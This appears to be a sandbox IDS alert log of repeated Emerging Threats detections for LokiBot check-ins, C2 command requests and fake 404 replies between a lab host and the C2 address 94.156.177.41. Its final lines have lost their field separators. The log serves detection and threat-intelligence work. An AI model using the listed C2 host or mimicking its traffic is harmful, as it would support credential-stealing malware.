2024-11-20T07:57:45.533689+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49217 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:45.538504+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49217 | TCP
2024-11-20T07:57:45.683162+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49218 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:45.683162+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49218 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:45.683162+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49218 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:46.392082+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49218 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:46.392082+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49218 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:46.397054+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49218 | TCP
2024-11-20T07:57:46.572052+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49219 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:46.572052+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49219 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:46.572052+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49219 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:47.435298+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49219 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:47.435298+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49219 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:47.440139+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49219 | TCP
2024-11-20T07:57:47.625431+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49220 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:47.625431+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49220 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:47.625431+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49220 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:48.350376+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49220 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:48.350376+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49220 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:48.355331+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49220 | TCP
2024-11-20T07:57:48.537909+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49221 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:48.537909+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49221 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:48.537909+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49221 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:49.387296+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49221 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:49.387296+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49221 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:49.392166+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49221 | TCP
2024-11-20T07:57:49.537253+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49222 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:49.537253+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49222 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:49.537253+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49222 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:50.396869+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49222 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:50.396869+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49222 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:50.401732+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49222 | TCP
2024-11-20T07:57:50.541403+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49223 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:50.541403+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49223 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:50.541403+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49223 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:51.400249+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49223 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:51.400249+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49223 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:51.405120+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49223 | TCP
2024-11-20T07:57:51.550185+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49224 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:51.550185+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49224 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:51.550185+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49224 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:52.414699+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49224 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:52.414699+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49224 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:52.419599+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49224 | TCP
2024-11-20T07:57:52.571474+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49225 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:52.571474+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49225 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:52.571474+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49225 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:53.412939+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49225 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:53.412939+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49225 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:53.417983+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49225 | TCP
2024-11-20T07:57:53.565464+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49226 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:53.565464+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49226 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:53.565464+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49226 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:54.297505+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49226 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:54.297505+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49226 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:54.302370+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49226 | TCP
2024-11-20T07:57:54.459148+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49227 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:54.459148+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49227 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:54.459148+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49227 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:55.163739+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49227 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:55.163739+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49227 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:55.168793+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49227 | TCP
2024-11-20T07:57:55.316399+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49228 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:55.316399+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49228 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:55.316399+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49228 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.037599+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49228 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.037599+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49228 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.042606+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49228 | TCP
2024-11-20T07:57:56.191793+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49229 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.191793+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49229 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.191793+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49229 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.912319+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49229 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.912319+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49229 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.917175+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49229 | TCP
2024-11-20T07:57:57.056887+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49230 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:57.056887+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49230 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:57.056887+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49230 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:57.913305+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49230 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:57.913305+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49230 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:57.919026+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49230 | TCP
2024-11-20T07:57:58.063832+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49231 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:58.063832+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49231 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:58.063832+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49231 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:58.907092+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49231 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:58.907092+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49231 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:58.925815+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49231 | TCP
2024-11-20T07:57:59.315019+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49232 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:59.315019+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49232 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:59.315019+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49232 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:00.178852+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49232 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:00.178852+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49232 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:00.184000+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49232 | TCP
2024-11-20T07:58:00.406324+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49233 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:00.406324+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49233 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:00.406324+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49233 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:01.249409+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49233 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:01.249409+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49233 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:01.254920+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49233 | TCP
2024-11-20T07:58:01.402550+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49234 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:01.402550+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49234 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:01.402550+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49234 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:02.252446+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49234 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:02.252446+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49234 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:02.257306+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49234 | TCP
2024-11-20T07:58:02.410939+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49235 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:02.410939+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49235 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:02.410939+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49235 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:03.143133+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49235 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:03.143133+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49235 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:03.147969+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49235 | TCP
2024-11-20T07:58:03.281828+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49236 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:03.281828+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49236 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:03.281828+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49236 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:04.012582+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49236 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:04.012582+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49236 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:04.017516+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49236 | TCP
2024-11-20T07:58:04.153651+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49237 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:04.153651+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49237 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:04.153651+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49237 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.015654+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49237 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.015654+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49237 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.020538+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49237 | TCP
2024-11-20T07:58:05.170720+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49238 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.170720+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49238 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.170720+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49238 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.888261+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49238 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.888261+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49238 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.893320+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49238 | TCP
2024-11-20T07:58:06.042036+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49239 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:06.042036+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49239 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:06.042036+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49239 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:06.878837+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49239 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:06.878837+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49239 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:06.884043+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49239 | TCP
2024-11-20T07:58:07.032370+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49240 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:07.032370+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49240 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:07.032370+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49240 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:07.903785+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49240 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:07.903785+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49240 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:07.913735+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49240 | TCP
2024-11-20T07:58:08.079653+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.22 | 49241 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:08.079653+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.22 | 49241 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:08.079653+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.22 | 49241 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:08.914515+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.22 | 49241 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:08.914515+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.22 | 49241 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:08.919532+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.22 | 49241 | TCP
                                                                    2024-11-20T07:58:09.075720+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.075720+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.075720+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.790944+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.790944+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924294.156.177.4180TCP
                                                                    2024-11-20T07:58:09.795871+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249242TCP
                                                                    2024-11-20T07:58:09.961207+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:09.961207+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:09.961207+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:10.690343+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:10.690343+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924394.156.177.4180TCP
                                                                    2024-11-20T07:58:10.695527+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249243TCP
                                                                    2024-11-20T07:58:10.842151+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:10.842151+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:10.842151+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:11.687264+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:11.687264+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924494.156.177.4180TCP
                                                                    2024-11-20T07:58:11.692160+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249244TCP
                                                                    2024-11-20T07:58:11.848537+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:11.848537+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:11.848537+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:12.561533+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:12.561533+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924594.156.177.4180TCP
                                                                    2024-11-20T07:58:12.566542+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249245TCP
                                                                    2024-11-20T07:58:12.738339+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:12.738339+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:12.738339+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:13.441956+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:13.441956+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924694.156.177.4180TCP
                                                                    2024-11-20T07:58:13.446885+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249246TCP
                                                                    2024-11-20T07:58:13.595288+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:13.595288+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924794.156.177.4180TCP
                                                                    2024-11-20T07:58:13.595288+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924794.156.177.4180TCP
